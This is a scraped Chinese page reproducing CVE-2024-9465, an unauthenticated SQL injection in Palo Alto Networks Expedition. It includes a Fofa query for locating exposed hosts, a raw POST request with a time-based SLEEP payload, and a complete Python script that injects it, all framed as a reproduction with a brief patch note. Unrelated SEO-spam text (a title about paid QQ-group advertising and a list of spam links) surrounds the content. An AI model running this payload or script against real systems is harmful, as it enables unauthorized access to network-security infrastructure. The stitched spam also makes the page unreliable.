当前位置: 首页 > news >正文

网站建qq群帮别人发广告赚钱平台

news 2025/7/27 5:54:36
网站建qq群,帮别人发广告赚钱平台,徐州网站建设4,永久免费做网站app0x01 产品介绍: Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述&am…

0x01 产品介绍:

        Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述:

        该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生

0x03 影响版本:

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句:

Fofa:title="Expedition Project"

0x05 漏洞复现:

poc

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

 

检测脚本:

脚本作者:https://github.com/horizon3ai/CVE-2024-9465

#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f'[*] Creating Checkpoint database table...')data = {'action': 'get','type': 'existing_ruleBases','project': 'pandbRBAC',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)if r.status_code == 200 and 'ruleBasesNames' in r.text:print(f'[*] Successfully created the database table')returnprint(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')sys.exit(1)def inject_checkpoint_query(url: str):start_time = time.time()print(f'[*] Injecting 10 second sleep payload into database query...')data = {'action': 'import','type': 'test','project': 'pandbRBAC','signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)execution_time = time.time() - start_timeif r.status_code == 200 and execution_time > 9 and execution_time < 15:print(f'[*] Successfully sent injection payload!')print(f'[+] Target is vulnerable, request took {execution_time} seconds')returnprint(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')sys.exit(1)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)args = parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)

 

0x06 修复建议:

厂商已发布补丁 请即时升级

Expedition | Palo Alto Networks

http://www.zhongyajixie.com/news/59331.html

相关文章:

  • 广告设计培训软件排名seo公司
  • 做一下网站收购废钢微信搜一搜怎么做推广
  • 网站制作报价开石家庄限号
  • 专业俄文网站建设深圳优化公司
  • 什么网站是做货到付款的app定制开发
  • 2017年网站外链怎么做最近一周新闻大事
  • 想做交友网站怎么做站长推荐黄色
  • 大足建网站的西安网络科技公司排名
  • 支付宝手机网站支付前端怎么做杭州seo网站优化公司
  • 教人做美食的网站网站seo重庆
  • 做网站用哪个eclipse长沙网络营销咨询费用
  • 苏南建设集团网站个人博客网站怎么做
  • 电商网站有哪些使用场景广州seo网站
  • 男女做男个真实视频网站郑州网站建设公司排名
  • 做农产品的b2c网站seo排名工具给您好的建议
  • 新华路网站建设深圳seo培训
  • 做公众号用什么网站市场seo是什么意思
  • 做公司网站备案可以个人厦门seo关键词排名
  • 怎么做网站的百度收录廊坊seo
  • 设计网站免费大全全网营销推广是什么
  • 东莞网站推广策划活动推广app最快的方法
  • 做soho一定要做网站吗网络营销怎么做
  • 制作手工灯笼排名优化关键词
  • 网站源码路径百度推广查询
  • 罗湖网站建设优化尚硅谷培训机构官网
  • 建个网站平台需要多少钱湖南长沙关键词推广电话
  • 怎么盗号网站怎么做太原seo建站
  • 人力资源网站模板产品推广策划书
  • 网站建设的基本需求有哪些方面广告营销策略有哪些
  • 亚马逊站外推广平台有哪些沧州网站建设推广